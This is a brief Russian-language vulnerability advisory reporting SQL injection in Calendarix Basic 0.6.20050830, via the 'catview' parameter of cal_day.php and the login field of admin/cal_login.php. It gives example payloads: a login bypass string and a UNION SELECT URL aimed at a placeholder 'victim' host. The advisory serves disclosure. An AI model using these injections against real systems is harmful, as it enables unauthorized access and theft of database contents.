Программа: Calendarix Basic 0.6.20050830, возможно более ранние версии
Уязвимость существует из-за недостаточной обработки входных данных в параметре "catview"
в сценарии "cal_day.php" в параметре "login" в сценарии "admin/cal_login.php".
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.
Пример:
Link: http://victim/calendarix/admin/cal_login.php
username: ' or 1/*
password: any
http://victim/calendarix/cal_day.php? op=day&date=2006-01-10 &catview=99%
20union%20select% 2012345